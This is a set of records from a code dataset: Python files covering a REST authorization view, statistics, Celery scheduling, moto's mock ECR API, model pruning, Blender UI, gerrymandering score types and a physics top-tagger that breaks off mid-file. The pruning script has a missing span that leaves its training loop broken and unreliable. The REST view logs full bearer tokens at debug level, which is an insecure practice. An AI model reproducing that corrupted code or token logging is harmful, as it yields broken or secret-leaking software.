before returning.\n        for record in cursor.fetchall():\n            # record refers to one day's summary\n            result = {}\n            # result is used to construct a new, filtered, summary with\n            # only the values listed in settings.RETURN_HEADERS.\n            for key, value in record.iteritems():\n                if key in settings.RETURN_HEADERS:\n                    # keys listed in settings.RETURN_HEADERS represent\n                    # summary fields the REST interface has been configured\n                    # to return. As such we need to add that field to the\n                    # new summary we are constructing\n                    result.update({key: value})\n\n            results_list.append(result)\n\n        return results_list\n\n    def _request_to_token(self, request):\n        \"\"\"Get the token from the request.\"\"\"\n        try:\n            token = request.META['HTTP_AUTHORIZATION'].split()[1]\n        except KeyError:\n            self.logger.error(\"No AUTHORIZATION header provided, \"\n                              \"authentication failed.\")\n            return None\n        except IndexError:\n            self.logger.error(\"AUTHORIZATION header provided, \"\n                              \"but not of expected form.\")\n            self.logger.error(request.META['HTTP_AUTHORIZATION'])\n            return None\n        self.logger.info(\"Successfully extracted Token\")\n        self.logger.debug(\"Full Token: %s\", token)\n        return token\n\n    def _is_client_authorized(self, client_id):\n        \"\"\"\n        Return true if and only if client_id can access summaries.\n\n        i.e. 
client_id is not None and is in settings.ALLOWED_FOR_GET.\n        \"\"\"\n        if client_id is None or client_id not in settings.ALLOWED_FOR_GET:\n            self.logger.error(\"%s does not have permission to view summaries\",\n                              client_id)\n            return False\n        self.logger.info(\"Authorizing user request\")\n        return True\n","repo_name":"apel/rest","sub_path":"api/views/CloudRecordSummaryView.py","file_name":"CloudRecordSummaryView.py","file_ext":"py","file_size_in_byte":11528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25456611727","text":"import math\n\nn = int(input())\nstrx = input().split(' ')\nx = list(map(float, strx[:n]))\ny = list(map(float, input().split(' ')))\n\n\ndef get_mean(l, d):\n    total = 0\n    for x in l:\n        total += x\n    return round(total/len(l), d)\n\ndef get_std_dev(l, d, mean):\n    s = 0\n    for n in l:\n        s += math.pow(n-mean, 2)\n    return round(math.sqrt(s/len(l)), d)\n\ndef get_pcc(x, y, n, d):\n    mean_x = get_mean(x, 2)\n    std_x = get_std_dev(x, 5, mean_x)\n    mean_y = get_mean(y, 2)\n    std_y = get_std_dev(y, 5, mean_y)\n    upper = 0\n    for i in range(n):\n        upper += ((x[i]-mean_x)*(y[i]-mean_y))\n    return round(upper/(n*std_x*std_y), d) \n\nprint(get_pcc(x,y,n,3))","repo_name":"DiegoSolorzanoO/10DaysOfStatistics","sub_path":"case16.py","file_name":"case16.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28906652327","text":"from typing import Set\n\nfrom whacked4.dehacked.statequery.filterbase import StateFilterBase\nfrom whacked4.dehacked.statequery.thingfilter import ThingStateFilter\nfrom whacked4.dehacked.statequery.weaponfilter import WeaponStateFilter\n\n\nclass UnusedStateFilter(StateFilterBase):\n\n    def apply(self, state_indices: Set[int]) -> Set[int]:\n        used_states = set()\n\n        # Add all states used by things.\n        thing_states = set()\n        for thing in self.patch.things:\n            thing_states.update(ThingStateFilter.get_states(thing))\n        self.expand_used_states(thing_states)\n        used_states.update(thing_states)\n\n        # Add all states used by weapons. 
Weapon states are further processed per weapon to take care of the\n        # usesExtraFlashState property of some actions.\n        for weapon in self.patch.weapons:\n            weapon_states = WeaponStateFilter.get_states(weapon)\n            self.expand_used_states(weapon_states)\n            WeaponStateFilter.process_states(self.patch, weapon, weapon_states)\n            used_states.update(weapon_states)\n\n        # Add states that are hardcoded by the engine.\n        engine_used_states = set(self.patch.engine.used_states)\n        self.expand_used_states(engine_used_states)\n        used_states.update(engine_used_states)\n\n        return state_indices.difference(used_states)\n","repo_name":"GitExl/WhackEd4","sub_path":"src/whacked4/dehacked/statequery/unusedfilter.py","file_name":"unusedfilter.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"42085911896","text":"import os\nfrom celery import Celery\nfrom celery.schedules import crontab\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'StockPriceDjango.settings')\napp = Celery('StockPriceDjango')\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks()\n\napp.conf.beat_schedule = {\n    'send_mail_workday_from_9_to_5': {\n        'task': 'Email.tasks.send_email',\n        'schedule': crontab(\n            day_of_week='mon,tue,wed,thu,fri',\n            hour='9-17',\n            minute=0\n        )\n    }\n}\n\napp.conf.task_ignore_result = False\n\n\n@app.task(bind=True)\ndef debug_task(self):\n    print(f'Request: {self.request!r}')\n","repo_name":"Sheldonsu28/StockPriceDjango","sub_path":"source code/StockPriceDjango/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17857329381","text":"\nclass Node:\n    def __init__(self, val=0, neighbors=None):\n        self.val = val\n        self.neighbors = neighbors if neighbors is not None else []\n\n\nclass Solution:\n    def cloneGraph(self, node: 'Node') -> 'Node':\n        if not node:\n            return\n\n        # remember the entry node's value so its clone can be returned at the end\n        start_val = node.val\n\n        graph = {}\n        stack = [node]\n        visited = set()\n\n        while len(stack) > 0:\n            current = stack.pop()\n            if current.val in visited:\n                continue\n            visited.add(current.val)\n            if current.val not in graph:\n                graph[current.val] = []\n\n            for neighbor in current.neighbors:\n\n                graph[current.val].append(neighbor.val)\n                stack.append(neighbor)\n\n        nodeMap = {}\n        for nodeValue in graph:\n            if nodeValue in nodeMap:\n                newNode = nodeMap[nodeValue]\n            else:\n                newNode = Node(nodeValue)\n                nodeMap[nodeValue] = newNode\n\n            for neighborValue in graph[nodeValue]:\n                if neighborValue in nodeMap:\n                    neighborNode = nodeMap[neighborValue]\n                else:\n                    neighborNode = Node(neighborValue)\n                    nodeMap[neighborValue] = neighborNode\n\n                if neighborNode not in newNode.neighbors:\n                    newNode.neighbors.append(neighborNode)\n\n        # return the clone of the node we started from, not an arbitrary one\n        return nodeMap[start_val]\n\n\nsol = Solution()\nnode1 = Node(1)\nnode2 = Node(2)\nnode3 = Node(3)\nnode4 = Node(4)\n\nnode1.neighbors = [node2, node4]\nnode2.neighbors = [node1, node3]\nnode3.neighbors = [node2, node4]\nnode4.neighbors = [node1, node3]\nres = sol.cloneGraph(node1)\nprint()\n","repo_name":"YichiZ/leetcode","sub_path":"clone-graph/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32303460731","text":"import json\nfrom base64 import b64encode\nfrom datetime import datetime\nimport 
time\n\nfrom moto.core.responses import BaseResponse\nfrom .models import ecr_backends, ECRBackend\n\n\nclass ECRResponse(BaseResponse):\n def __init__(self) -> None:\n super().__init__(service_name=\"ecr\")\n\n @property\n def ecr_backend(self) -> ECRBackend:\n return ecr_backends[self.current_account][self.region]\n\n def create_repository(self) -> str:\n repository_name = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n encryption_config = self._get_param(\"encryptionConfiguration\")\n image_scan_config = self._get_param(\"imageScanningConfiguration\")\n image_tag_mutablility = self._get_param(\"imageTagMutability\")\n tags = self._get_param(\"tags\", [])\n\n repository = self.ecr_backend.create_repository(\n repository_name=repository_name,\n registry_id=registry_id,\n encryption_config=encryption_config,\n image_scan_config=image_scan_config,\n image_tag_mutablility=image_tag_mutablility,\n tags=tags,\n )\n return json.dumps({\"repository\": repository.response_object})\n\n def describe_repositories(self) -> str:\n describe_repositories_name = self._get_param(\"repositoryNames\")\n registry_id = self._get_param(\"registryId\")\n\n repositories = self.ecr_backend.describe_repositories(\n repository_names=describe_repositories_name, registry_id=registry_id\n )\n return json.dumps({\"repositories\": repositories, \"failures\": []})\n\n def delete_repository(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n force = self._get_param(\"force\")\n\n repository = self.ecr_backend.delete_repository(\n repository_str, registry_id, force\n )\n return json.dumps({\"repository\": repository.response_object})\n\n def put_image(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n image_manifest = self._get_param(\"imageManifest\")\n image_tag = self._get_param(\"imageTag\")\n image_manifest_media_type = self._get_param(\"imageManifestMediaType\")\n digest = self._get_param(\"imageDigest\")\n image = self.ecr_backend.put_image(\n repository_str, image_manifest, image_tag, image_manifest_media_type, digest\n )\n\n return json.dumps({\"image\": image.response_object})\n\n def list_images(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n images = self.ecr_backend.list_images(repository_str, registry_id)\n return json.dumps(\n {\"imageIds\": [image.response_list_object for image in images]}\n )\n\n def describe_images(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n image_ids = self._get_param(\"imageIds\")\n images = self.ecr_backend.describe_images(\n repository_str, registry_id, image_ids\n )\n return json.dumps(\n {\"imageDetails\": [image.response_describe_object for image in images]}\n )\n\n def batch_check_layer_availability(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\n \"ECR.batch_check_layer_availability is not yet implemented\"\n )\n\n def batch_delete_image(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n image_ids = self._get_param(\"imageIds\")\n\n response = self.ecr_backend.batch_delete_image(\n repository_str, registry_id, image_ids\n )\n return json.dumps(response)\n\n def batch_get_image(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n image_ids = 
self._get_param(\"imageIds\")\n\n response = self.ecr_backend.batch_get_image(\n repository_str, registry_id, image_ids\n )\n return json.dumps(response)\n\n def batch_get_repository_scanning_configuration(self) -> str:\n names = self._get_param(\"repositoryNames\")\n configs, missing = self.ecr_backend.batch_get_repository_scanning_configuration(\n names\n )\n return json.dumps(\n {\n \"scanningConfigurations\": configs,\n \"failures\": [\n {\n \"repositoryName\": m,\n \"failureCode\": \"REPOSITORY_NOT_FOUND\",\n \"failureReason\": \"REPOSITORY_NOT_FOUND\",\n }\n for m in missing\n ],\n }\n )\n\n def complete_layer_upload(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\"ECR.complete_layer_upload is not yet implemented\")\n\n def delete_repository_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.delete_repository_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def get_authorization_token(self) -> str:\n registry_ids = self._get_param(\"registryIds\")\n if not registry_ids:\n registry_ids = [self.current_account]\n auth_data = []\n for registry_id in registry_ids:\n password = f\"{registry_id}-auth-token\"\n auth_token = b64encode(f\"AWS:{password}\".encode(\"ascii\")).decode()\n auth_data.append(\n {\n \"authorizationToken\": auth_token,\n \"expiresAt\": time.mktime(datetime(2015, 1, 1).timetuple()),\n \"proxyEndpoint\": f\"https://{registry_id}.dkr.ecr.{self.region}.amazonaws.com\",\n }\n )\n return json.dumps({\"authorizationData\": auth_data})\n\n def get_download_url_for_layer(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\n \"ECR.get_download_url_for_layer is not yet implemented\"\n )\n\n def get_repository_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.get_repository_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def initiate_layer_upload(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\"ECR.initiate_layer_upload is not yet implemented\")\n\n def set_repository_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n policy_text = self._get_param(\"policyText\")\n # this is usually a safety flag to prevent accidental repository lock outs\n # but this would need a much deeper validation of the provided policy\n # force = self._get_param(\"force\")\n\n return json.dumps(\n self.ecr_backend.set_repository_policy(\n registry_id=registry_id,\n repository_name=repository_name,\n policy_text=policy_text,\n )\n )\n\n def upload_layer_part(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\"ECR.upload_layer_part is not yet implemented\")\n\n def list_tags_for_resource(self) -> str:\n arn = self._get_param(\"resourceArn\")\n\n return json.dumps(self.ecr_backend.list_tags_for_resource(arn))\n\n def tag_resource(self) -> str:\n arn = self._get_param(\"resourceArn\")\n tags = self._get_param(\"tags\", [])\n\n self.ecr_backend.tag_resource(arn, tags)\n return \"{}\"\n\n def untag_resource(self) -> str:\n arn = self._get_param(\"resourceArn\")\n tag_keys = self._get_param(\"tagKeys\", [])\n\n self.ecr_backend.untag_resource(arn, tag_keys)\n return \"{}\"\n\n def put_image_tag_mutability(self) -> str:\n registry_id = self._get_param(\"registryId\")\n 
repository_name = self._get_param(\"repositoryName\")\n image_tag_mutability = self._get_param(\"imageTagMutability\")\n\n return json.dumps(\n self.ecr_backend.put_image_tag_mutability(\n registry_id=registry_id,\n repository_name=repository_name,\n image_tag_mutability=image_tag_mutability,\n )\n )\n\n def put_image_scanning_configuration(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_scan_config = self._get_param(\"imageScanningConfiguration\")\n\n return json.dumps(\n self.ecr_backend.put_image_scanning_configuration(\n registry_id=registry_id,\n repository_name=repository_name,\n image_scan_config=image_scan_config,\n )\n )\n\n def put_lifecycle_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n lifecycle_policy_text = self._get_param(\"lifecyclePolicyText\")\n\n return json.dumps(\n self.ecr_backend.put_lifecycle_policy(\n registry_id=registry_id,\n repository_name=repository_name,\n lifecycle_policy_text=lifecycle_policy_text,\n )\n )\n\n def get_lifecycle_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.get_lifecycle_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def delete_lifecycle_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.delete_lifecycle_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def put_registry_policy(self) -> str:\n policy_text = self._get_param(\"policyText\")\n\n return json.dumps(self.ecr_backend.put_registry_policy(policy_text=policy_text))\n\n def get_registry_policy(self) -> str:\n return json.dumps(self.ecr_backend.get_registry_policy())\n\n def delete_registry_policy(self) -> str:\n return json.dumps(self.ecr_backend.delete_registry_policy())\n\n def start_image_scan(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_id = self._get_param(\"imageId\")\n\n return json.dumps(\n self.ecr_backend.start_image_scan(\n registry_id=registry_id,\n repository_name=repository_name,\n image_id=image_id,\n )\n )\n\n def describe_image_scan_findings(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_id = self._get_param(\"imageId\")\n\n return json.dumps(\n self.ecr_backend.describe_image_scan_findings(\n registry_id=registry_id,\n repository_name=repository_name,\n image_id=image_id,\n )\n )\n\n def put_replication_configuration(self) -> str:\n replication_config = self._get_param(\"replicationConfiguration\")\n\n return json.dumps(\n self.ecr_backend.put_replication_configuration(\n replication_config=replication_config\n )\n )\n\n def put_registry_scanning_configuration(self) -> str:\n scan_type = self._get_param(\"scanType\")\n rules = self._get_param(\"rules\")\n self.ecr_backend.put_registry_scanning_configuration(rules)\n return json.dumps({\"scanType\": scan_type, \"rules\": rules})\n\n def describe_registry(self) -> str:\n return 
json.dumps(self.ecr_backend.describe_registry())\n","repo_name":"getmoto/moto","sub_path":"moto/ecr/responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"31215008580","text":"class Koans:\n def __init__(self):\n import collections\n self.koans = collections.OrderedDict()\n # Any koan must be built, and a build error immediately fails.\n # However, more tests can be defined here.\n # For example, emu-(aplite|basalt|chalk).\n # Basically, the first test is building\n self.koans['about-types'] = {'tests': [\n {\n 'name': 'emu-aplite',\n 'assertions': [\n 'about-types-ints',\n 'about-types-chars',\n 'about-types-int-arrays',\n 'about-types-strings'\n ]\n }\n ]}\n self.koans['about-math'] = {'tests': [\n {\n 'name': 'emu-aplite',\n 'assertions': [\n 'about-math-addition',\n 'about-math-multiplication',\n 'about-math-division',\n 'about-math-increment',\n 'about-math-decrement'\n ]\n }\n ]}\n\n def addPristineKoans(self):\n import os\n import shutil\n assert os.path.isdir(self.getPristineKoanDir(''))\n if not os.path.isdir(self.getKoanDir('')):\n os.mkdir(self.getKoanDir(''))\n for koan in self.koans.keys():\n koan_path = self.getKoanDir(koan)\n if not os.path.isdir(koan_path): # Don't overwrite koans.\n pristine_path = self.getPristineKoanDir(koan)\n assert os.path.isdir(pristine_path)\n shutil.copytree(pristine_path, koan_path)\n\n def getPristineKoanDir(self, koan):\n import os\n return os.path.join('koans_pristine', koan)\n\n def getKoanDir(self, koan):\n import os\n return os.path.join('koans', koan)\n\n def unsolveAll(self):\n import os\n for koan in self.koans.keys():\n if os.path.exists(os.path.join(self.getKoanDir(koan), 'SOLVED')):\n os.unlink(os.path.join(self.getKoanDir(koan), 'SOLVED'))\n\n def isSolved(self, koan):\n import os\n return os.path.exists(os.path.join(self.getKoanDir(koan), 'SOLVED'))\n\n def setSolved(self, koan):\n import os\n with open(os.path.join(self.getKoanDir(koan), 'SOLVED'), 'w') as fh:\n fh.write('')\n\n def getNextSolvable(self):\n next = None\n for koan in self.koans.keys():\n if not self.isSolved(koan):\n next = koan\n break\n return next\n\n def getSolvable(self):\n solvable = []\n for koan in self.koans.keys():\n if not self.isSolved(koan):\n solvable.append(koan)\n return solvable\n\n def getSolvedAmount(self):\n solved = 0\n for koan in self.koans.keys():\n if self.isSolved(koan):\n solved += 1\n else:\n break\n return solved, len(self.koans)\n\n def getTests(self, koan):\n return self.koans[koan]['tests']\n","repo_name":"koans-for-pebble/koans-for-pebble","sub_path":"koan_lib/koans.py","file_name":"koans.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8218456880","text":"import sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport torch_pruning as tp\nimport argparse\nimport torch\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\nimport torch.nn.functional as F\nimport torch.nn as nn \nimport numpy as np \nimport registry\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--mode', type=str, required=True, choices=['train', 'prune', 'test'])\nparser.add_argument('--model', type=str, required=True)\nparser.add_argument('--dataset', type=str, default='cifar100')\nparser.add_argument('--batch_size', type=int, 
default=256)\nparser.add_argument('--verbose', action='store_true', default=False)\nparser.add_argument('--total_epochs', type=int, default=100)\nparser.add_argument('--lr_decay_milestones', default=\"40,60,80\", type=str,\n                    help='milestones for learning rate decay')\nparser.add_argument('--restore', type=str, default=None)\nparser.add_argument('--sparsity', type=float, default=0.8)\nparser.add_argument('--pruning_steps', type=int, default=4)\n\nargs = parser.parse_args()\n\n\ndef eval(model, test_loader):\n    correct = 0\n    total = 0\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    model.to(device)\n    model.eval()\n    with torch.no_grad():\n        for i, (img, target) in enumerate(test_loader):\n            img = img.to(device)\n            out = model(img)\n            pred = out.max(1)[1].detach().cpu().numpy()\n            target = target.cpu().numpy()\n            correct += (pred==target).sum()\n            total += len(target)\n    return correct / total\n\ndef train_model(model, train_loader, test_loader, pruning_step=None):\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)\n    milestones = [ int(ms) for ms in args.lr_decay_milestones.split(',') ]\n    scheduler = torch.optim.lr_scheduler.MultiStepLR( optimizer, milestones=milestones, gamma=0.1)\n    model.to(device)\n\n    best_acc = -1\n    for epoch in range(args.total_epochs):\n        model.train()\n        for i, (img, target) in enumerate(train_loader):\n            img, target = img.to(device), target.to(device)\n            optimizer.zero_grad()\n            out = model(img)\n            loss = F.cross_entropy(out, target)\n            loss.backward()\n            optimizer.step()\n            if i%10==0 and args.verbose:\n                print(\"Epoch %d/%d, iter %d/%d, loss=%.4f\"%(epoch, args.total_epochs, i, len(train_loader), loss.item()))\n        model.eval()\n        acc = eval(model, test_loader)\n        print(\"Epoch %d/%d, Acc=%.4f\"%(epoch, args.total_epochs, acc))\n        if best_acc %.2fM\"%(ori_size/1e6 ,pruned_size/1e6))\n        train_model(model, train_loader, test_loader)\n\n    elif args.mode=='test':\n        print(\"Load model from %s\"%( args.restore ))\n        params = tp.utils.count_params(model)\n        print(\"Number of Parameters: %.1fM\"%(params/1e6))\n        acc = eval(model, test_loader)\n        print(\"Acc=%.4f\\n\"%(acc))\n\nif __name__=='__main__':\n    main()\n","repo_name":"ghimiredhikura/laasp-filter-pruning","sub_path":"torch_pruning_tool/examples/cifar/prune_cifar.py","file_name":"prune_cifar.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"28738922824","text":"import bpy\nfrom bpy.props import *\nfrom bpy.types import (Panel,\n                       Operator,\n                       AddonPreferences,\n                       PropertyGroup,\n                       )\nimport os\nfrom ... icons import get_icon_id\nfrom ... utils.addons import addon_exists\nfrom ... 
preferences import pro_mode_enabled\n\nclass HopsOperationsPanel(bpy.types.Panel):\n bl_label = \"Operations\"\n bl_category = \"HardOps\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_options = {'DEFAULT_CLOSED'}\n\n def draw(self, context):\n layout = self.layout\n\n active_object = context.active_object\n\n if active_object is None:\n layout.label(\"Select object first\")\n elif active_object.mode == \"OBJECT\":\n\n layout = self.layout.column(1) \n row = layout.row(1)\n row.operator_context = 'INVOKE_DEFAULT'\n row.operator(\"step.sstep\", text = \"(S) Step\", icon_value=get_icon_id(\"Sstep\"))\n row.operator(\"step.cstep\", text = \"(C) Step\", icon_value=get_icon_id(\"Cstep\"))\n\n row = layout.row(1)\n row.operator(\"hops.adjust_bevel\", text = \"(B)Width\", icon_value=get_icon_id(\"AdjustBevel\"))\n\n layout.separator()\n row = layout.row(1)\n row.operator(\"nw.a_rray\", text = \"(Q)Array\", icon_value=get_icon_id(\"Qarray\"))\n row.operator(\"hops.adjust_tthick\", text = \"(T)Thick\", icon_value=get_icon_id(\"Tthick\"))\n\n layout.separator()\n row = layout.row(1)\n row.operator(\"hops.draw_uv\", text = \"UV Preview\", icon_value=get_icon_id(\"CUnwrap\")) \n \n row = layout.row(1)\n row.operator(\"hops.soft_sharpen\", text = \"(S) Sharpen\", icon_value=get_icon_id(\"Ssharpen\"))\n\n row.operator(\"hops.soft_sharpen\", text = \"(C) Sharpen\", icon_value=get_icon_id(\"CSharpen\"))\n row = layout.row(1)\n row.operator(\"clean.sharps\", text = \"Clear S/C/Sharps\", icon_value=get_icon_id(\"CleansharpsE\"))\n\n layout.separator()\n row.operator(\"view3d.clean_mesh\", text = \"Clean Mesh (E)\", icon_value=get_icon_id(\"CleansharpsE\"))\n row = layout.row(1)\n row.operator(\"hops.2d_bevel\", text = \"(2d)Bevel\", icon_value=get_icon_id(\"AdjustBevel\"))\n\n\n elif active_object.mode == \"EDIT\":\n layout.menu(\"view3d.symmetry_submenu\", text = \"Symmetrize\", icon_value = get_icon_id(\"Xslap\"))\n\n ","repo_name":"mx1001/hops_p","sub_path":"ui/Panels/3_operations.py","file_name":"3_operations.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42535542856","text":"\nimport torch\n\n\nclass EMAWeightOptimizer (object):\n def __init__(self, target_net, source_net, initialize_to_source=True):\n self.target_net = target_net\n self.source_net = source_net\n #self.ema_alpha = ema_alpha\n\n # for p in target_net.parameters():\n # p.requires_grad = False\n\n self.target_params = [p for p in target_net.state_dict().values() if p.dtype == torch.float]\n self.source_params = [p for p in source_net.state_dict().values() if p.dtype == torch.float]\n\n if initialize_to_source:\n for tgt_p, src_p in zip(self.target_params, self.source_params):\n tgt_p[...] 
= src_p[...]\n\n        target_keys = set(target_net.state_dict().keys())\n        source_keys = set(source_net.state_dict().keys())\n        if target_keys != source_keys:\n            raise ValueError('Source and target networks do not have the same state dict keys; do they have different architectures?')\n\n    def step(self, ema_alpha):\n        one_minus_alpha = 1.0 - ema_alpha\n        for tgt_p, src_p in zip(self.target_params, self.source_params):\n            tgt_p.mul_(ema_alpha)\n            tgt_p.add_(src_p * one_minus_alpha)\n","repo_name":"EliasPa/thesis-ssl-ich-segmentation","sub_path":"networks/mean_teacher/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7661809885","text":"import os\nimport cv2\nimport time\n\n\n# combine the images in a folder into a video\ndef picvideo(path, size):\n    # path = r'C:\\Users\\Administrator\\Desktop\\1\\huaixiao\\\\'  # file path\n    filelist = os.listdir(path)  # get all file names in that directory\n\n    '''\n    fps:\n    frame rate: n images are written per second [to keep one image on screen for 5 seconds, use a frame rate of 1 and repeat that image 5 times] \n    if the folder holds 50 images of 534*300 and 5 are played per second, the video lasts 10 seconds\n    '''\n    fps = 3\n    #file_path = str(int(time.time())) + \".mp4\"  # output path\n    file_path = \"yolo_video.mp4\"  # output path\n    fourcc = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')  # different codecs map to different video formats (e.g. 'I','4','2','0' for avi)\n\n    video = cv2.VideoWriter(file_path, fourcc, fps, size)\n\n    for item in filelist:\n        if item.endswith('.jpg'):  # check whether the file extension is .jpg\n            item = path + '/' + item\n            img = cv2.imread(item)  # read the image with OpenCV; returns a numpy.ndarray with BGR channel order, values 0-255 by default\n            video.write(img)  # write the frame into the video\n\n    video.release()  # release\n\n\npicvideo(r'./yoloimages', (1280,720))","repo_name":"qingfeiyu/Depth-Aware-3D-Localization-of-Semantic-Objects","sub_path":"Picture_to_video.py","file_name":"Picture_to_video.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10322265611","text":"from dataclasses import dataclass\nfrom typing import Callable, Mapping, NamedTuple, Union\n\nfrom geopandas import GeoDataFrame\nfrom gerrychain import Partition\n\n\"\"\"\n    Typing Definitions:\n\n    * A Score is a named tuple of a name and function that takes a `gerrychain.Partition` instance and\n      returns a ScoreValue. 
The function associated with the Score should be deterministic, that is\n always return the same value given the same partition.\n * A ScoreValue is either a numeric, a mapping from districts to numerics, or a mapping from\n elections to numerics.\n\"\"\"\n\nNumeric = Union[float, int]\nDistrictID = Union[int, str]\nElectionID = str\n\nPlanWideScoreValue = Numeric\nDistrictWideScoreValue = Mapping[DistrictID, Numeric]\nElectionWideScoreValue = Mapping[ElectionID, Numeric]\n\nScoreValue = Union[PlanWideScoreValue, DistrictWideScoreValue, ElectionWideScoreValue]\n\n\n@dataclass\nclass Score:\n name: str\n apply: Callable[[Union[Partition, GeoDataFrame]], ScoreValue]\n dissolved: bool = False\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/scoring/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28580054114","text":"import ROOT\nROOT.PyConfig.IgnoreCommandLineOptions = True\nimport math\nfrom collections import defaultdict\nfrom itertools import permutations\nimport numpy as np\nimport itertools\n\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\nfrom PhysicsTools.NanoSUSYTools.modules.Stop0lObjectsProducer import DeepCSVMediumWP\n\n\nclass DeepTopProducer(Module):\n def __init__(self, era):\n ## WP from Hui's study https://indico.cern.ch/event/780000/contributions/3248659/attachments/1768782/2873013/Search_bin_study_with_combine_tools_v13.pdf\n self.DeepAK8TopWP = 0.9377\n self.minAK8TopMass = 105\n self.minAK8WMass = 65\n self.DeepAK8WWP = 0.9530\n self.DeepResolveWP = 0.92\n self.era = era\n self.metBranchName = \"MET\"\n\n def beginJob(self):\n pass\n def endJob(self):\n pass\n\n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n self.out = wrappedOutputTree\n self.out.branch(\"FatJet_Stop0l\", \"O\", lenVar=\"nFatJet\")\n self.out.branch(\"ResolvedTop_Stop0l\", \"O\", lenVar=\"nResolvedTop\")\n self.out.branch(\"Stop0l_nTop\", \"I\")\n self.out.branch(\"Stop0l_nW\", \"I\")\n self.out.branch(\"Stop0l_nResolved\", \"I\")\n self.out.branch(\"Stop0l_ISRJetIdx\", \"I\")\n self.out.branch(\"Stop0l_ISRJetPt\", \"F\")\n self.out.branch(\"Stop0l_nHOT\", \"I\")\n self.out.branch(\"Stop0l_HOTpt\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTeta\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTphi\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTmass\", \"F\", 